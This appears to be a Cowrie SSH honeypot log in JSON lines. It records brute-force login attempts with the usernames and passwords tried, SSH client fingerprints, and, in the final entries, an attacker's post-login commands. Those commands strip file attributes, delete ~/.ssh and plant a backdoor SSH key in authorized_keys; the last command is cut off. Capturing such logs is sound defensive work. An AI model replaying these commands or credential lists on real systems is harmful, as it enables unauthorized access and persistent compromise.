{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T13:51:53.955196Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:51:53.956182Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62292,"dst_ip":"1.2.3.4","dst_port":22,"session":"de3ef5e8d5c5","protocol":"ssh","message":"New connection: 212.227.235.229:62292 (1.2.3.4:22) [session: de3ef5e8d5c5]","sensor":"my-vps","timestamp":"2025-08-28T13:51:57.753317Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:51:57.754246Z","src_ip":"212.227.235.229","session":"de3ef5e8d5c5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:51:58.585192Z","src_ip":"212.227.235.229","session":"de3ef5e8d5c5"}
{"eventid":"cowrie.login.failed","username":"user","password":"magnus","message":"login attempt [user/magnus] failed","sensor":"my-vps","timestamp":"2025-08-28T13:51:59.313274Z","src_ip":"212.227.235.229","session":"de3ef5e8d5c5"}
{"eventid":"cowrie.login.failed","username":"user","password":"lesbians","message":"login attempt [user/lesbians] failed","sensor":"my-vps","timestamp":"2025-08-28T13:52:00.984990Z","src_ip":"212.227.235.229","session":"de3ef5e8d5c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59984,"dst_ip":"1.2.3.4","dst_port":22,"session":"91d0c6faabbe","protocol":"ssh","message":"New connection: 212.227.235.229:59984 (1.2.3.4:22) [session: 91d0c6faabbe]","sensor":"my-vps","timestamp":"2025-08-28T13:52:01.177147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:52:01.178102Z","src_ip":"212.227.235.229","session":"91d0c6faabbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:52:01.387512Z","src_ip":"212.227.235.229","session":"91d0c6faabbe"}
{"eventid":"cowrie.login.failed","username":"user","password":"krishna","message":"login attempt [user/krishna] failed","sensor":"my-vps","timestamp":"2025-08-28T13:52:02.160132Z","src_ip":"212.227.235.229","session":"de3ef5e8d5c5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:52:02.266080Z","src_ip":"212.227.235.229","session":"91d0c6faabbe"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:52:02.476649Z","src_ip":"212.227.235.229","session":"91d0c6faabbe"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:52:02.477667Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.login.failed","username":"user","password":"hungry","message":"login attempt [user/hungry] failed","sensor":"my-vps","timestamp":"2025-08-28T13:52:03.800200Z","src_ip":"212.227.235.229","session":"de3ef5e8d5c5"}
{"eventid":"cowrie.login.failed","username":"user","password":"hhhhhh","message":"login attempt [user/hhhhhh] failed","sensor":"my-vps","timestamp":"2025-08-28T13:52:04.964121Z","src_ip":"212.227.235.229","session":"de3ef5e8d5c5"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:52:06.129311Z","src_ip":"212.227.235.229","session":"de3ef5e8d5c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50350,"dst_ip":"1.2.3.4","dst_port":22,"session":"2232fdcde2af","protocol":"ssh","message":"New connection: 212.227.125.160:50350 (1.2.3.4:22) [session: 2232fdcde2af]","sensor":"my-vps","timestamp":"2025-08-28T13:52:15.228956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:52:15.230133Z","src_ip":"212.227.125.160","session":"2232fdcde2af"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:52:15.401525Z","src_ip":"212.227.125.160","session":"2232fdcde2af"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"qwerty","message":"login attempt [deploy/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:52:15.916638Z","src_ip":"212.227.125.160","session":"2232fdcde2af"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:52:17.089773Z","src_ip":"212.227.125.160","session":"2232fdcde2af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21444,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c092554c3c8","protocol":"ssh","message":"New connection: 212.227.125.160:21444 (1.2.3.4:22) [session: 3c092554c3c8]","sensor":"my-vps","timestamp":"2025-08-28T13:52:21.867011Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":64984,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c50da0401e9","protocol":"ssh","message":"New connection: 212.227.125.160:64984 (1.2.3.4:22) [session: 9c50da0401e9]","sensor":"my-vps","timestamp":"2025-08-28T13:52:22.199897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:52:22.200677Z","src_ip":"212.227.125.160","session":"9c50da0401e9"}
{"eventid":"cowrie.client.kex","hassh":"2aec6b44b06bec95d73f66b5d30cb69a","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a","sensor":"my-vps","timestamp":"2025-08-28T13:52:22.366935Z","src_ip":"212.227.125.160","session":"9c50da0401e9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:52:22.534630Z","src_ip":"212.227.125.160","session":"3c092554c3c8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57770,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4802aebe50c","protocol":"ssh","message":"New connection: 217.72.205.35:57770 (1.2.3.4:22) [session: c4802aebe50c]","sensor":"my-vps","timestamp":"2025-08-28T13:52:30.164973Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:52:30.166434Z","src_ip":"217.72.205.35","session":"c4802aebe50c"}
{"eventid":"cowrie.session.closed","duration":"15.0","message":"Connection lost after 15.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:52:37.200948Z","src_ip":"212.227.125.160","session":"9c50da0401e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33054,"dst_ip":"1.2.3.4","dst_port":22,"session":"63badc0df6a7","protocol":"ssh","message":"New connection: 212.227.125.160:33054 (1.2.3.4:22) [session: 63badc0df6a7]","sensor":"my-vps","timestamp":"2025-08-28T13:52:49.156731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:52:49.157787Z","src_ip":"212.227.125.160","session":"63badc0df6a7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:52:49.328749Z","src_ip":"212.227.125.160","session":"63badc0df6a7"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123123","message":"login attempt [deploy/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:52:49.851360Z","src_ip":"212.227.125.160","session":"63badc0df6a7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:52:51.024141Z","src_ip":"212.227.125.160","session":"63badc0df6a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63257,"dst_ip":"1.2.3.4","dst_port":22,"session":"18ec919ba99a","protocol":"ssh","message":"New connection: 212.227.125.160:63257 (1.2.3.4:22) [session: 18ec919ba99a]","sensor":"my-vps","timestamp":"2025-08-28T13:52:55.854979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:52:55.855946Z","src_ip":"212.227.125.160","session":"18ec919ba99a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:52:55.966769Z","src_ip":"212.227.125.160","session":"18ec919ba99a"}
{"eventid":"cowrie.login.failed","username":"warren","password":"warren","message":"login attempt [warren/warren] failed","sensor":"my-vps","timestamp":"2025-08-28T13:52:56.469964Z","src_ip":"212.227.125.160","session":"18ec919ba99a"}
{"eventid":"cowrie.login.failed","username":"warren","password":"warren1","message":"login attempt [warren/warren1] failed","sensor":"my-vps","timestamp":"2025-08-28T13:52:57.583122Z","src_ip":"212.227.125.160","session":"18ec919ba99a"}
{"eventid":"cowrie.login.failed","username":"warren","password":"warren123","message":"login attempt [warren/warren123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:52:58.705010Z","src_ip":"212.227.125.160","session":"18ec919ba99a"}
{"eventid":"cowrie.login.failed","username":"warren","password":"warren1234","message":"login attempt [warren/warren1234] failed","sensor":"my-vps","timestamp":"2025-08-28T13:52:59.826908Z","src_ip":"212.227.125.160","session":"18ec919ba99a"}
{"eventid":"cowrie.login.failed","username":"warren","password":"warren12345","message":"login attempt [warren/warren12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:53:00.948061Z","src_ip":"212.227.125.160","session":"18ec919ba99a"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:02.415508Z","src_ip":"212.227.125.160","session":"18ec919ba99a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53206,"dst_ip":"1.2.3.4","dst_port":22,"session":"777af0e70804","protocol":"ssh","message":"New connection: 212.227.125.160:53206 (1.2.3.4:22) [session: 777af0e70804]","sensor":"my-vps","timestamp":"2025-08-28T13:53:21.915319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:53:21.916213Z","src_ip":"212.227.125.160","session":"777af0e70804"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:53:22.096165Z","src_ip":"212.227.125.160","session":"777af0e70804"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"111111","message":"login attempt [deploy/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:53:22.639395Z","src_ip":"212.227.125.160","session":"777af0e70804"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:23.822654Z","src_ip":"212.227.125.160","session":"777af0e70804"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50468,"dst_ip":"1.2.3.4","dst_port":22,"session":"fefe3a9279ad","protocol":"ssh","message":"New connection: 212.227.235.229:50468 (1.2.3.4:22) [session: fefe3a9279ad]","sensor":"my-vps","timestamp":"2025-08-28T13:53:41.851952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:53:41.853384Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:53:42.060898Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin!23","message":"login attempt [root/Admin!23] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:53:42.932988Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:43.369506Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:53:43.370222Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:53:43.371069Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:43.580237Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:44.056333Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 